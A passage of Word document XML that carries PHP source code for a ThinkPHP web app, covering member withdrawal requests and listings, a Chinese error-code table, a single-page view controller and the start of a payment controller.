    </w:p>
    <w:p w14:paraId="079205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wxData){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9A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请绑定微信账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438DC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61D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D0C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yaoqing']['money'] || $money &gt; $this-&gt;member['yaoqing']['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117BA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零钱不足</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB2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566C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235127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_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B00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tixian')-&gt;insert([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D221D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this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C54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3C892A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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E91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30BB3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18CA1C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gt;  $user,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC6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gt;  $ip,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3C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xData'    =&gt;  $wxData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BC7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AF0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提现申请</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F6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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313A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this-&gt;member['id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAE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236A0E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100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C22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517C5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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE339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21F6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EF4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提现成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC864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B8B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ixian_list(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C6C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54F96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data/d')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF45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ata']=input('data/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E4F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DE3B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member_tixian')-&gt;field('id,money,data,time,type,user,wxData,content,user')-&gt;where($where)-&gt;order('time desc,id desc')-&gt;paginate()-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB05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25FBA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data=[0=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>未审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',1=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已到账</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',2=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',3=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打款中</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',4=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>申请失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FE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data']=$v['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612B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datas']=$_data[$v['data']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741EE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Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07702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s']=date('m-d H:i:s',$v['time']+86400);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B57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ype']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEB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json_decode(htmlspecialchars_decode($v['wxData']),true)['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4FA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414A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date('Y-m-d H:i:s',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7B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data'][$k]['wxData']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFAC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43F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98DE2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41D0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ixian_view(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8C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38B9C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4A33C7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3F77E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62F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719117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tixian')-&gt;where($where)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B3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s'] = date('Y-m-d H:i:s',$data['time']+86400);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB3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date('Y-m-d H:i:s',$data['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC29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type'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52549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 = json_decode(htmlspecialchars_decode($data['wxData']),true)['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381C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A0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xData'] = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B83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5E01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0A7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C4D2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5FFA6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4BA16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use think\Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACAA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1B6E3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E8E9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Define MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E7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s        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用显示数量（默认每页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条记录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19740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请求哪一页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F9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006E1A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调用显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA61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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C993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E64D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header('Access-Control-Allow-Origin:*');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A4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mmon extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8C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60BF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errors = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03128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0' =&gt; 'Success',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F30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1' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36F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2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段传值非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06543A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3' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命名不可重复</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685440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4' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344C4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05' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00404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1' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被访问资源不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C71E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2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源访问受限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CD0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3' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户无权限操作该资源</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A8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4' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A0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5' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源未通过审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB3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16' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章未设置关键字或标签</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBD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21' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16924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22' =&gt; 'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已过期，请先登录账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467E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23'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21E16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24'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5ED469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225' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF91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1' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码发送失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A00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2' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码错误或用户不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDBE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3' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43044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4' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码已被注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F0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5' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱已被注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42E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306' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号码没有对应的绑定用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711709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500' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请重新尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC68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501' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库操作失败，请重新尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3BF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502' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请勿重复操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E4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716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C5812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9CC2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68D9A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controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005B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model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EA5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3675A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AEE8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age extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA71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1687C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2072AF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AC5E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468C3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278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27F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page/view </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46740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单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7053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单页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F3B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3F8F1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5C94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d </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9C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6F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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48475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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D82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单页标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375A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body  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单页内容（富文本内容）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9E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99F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unction view()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D3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D9B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2295E0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page')-&gt;cache(true)-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC79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05DE70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8804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A1B05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199F70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14A0C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Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760B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Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398F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2F5E67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3B04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ay extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF2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8D86F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member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7232E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C4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2589F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name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38945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2D880C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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575F2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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6F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371A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Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51105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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BBF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token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
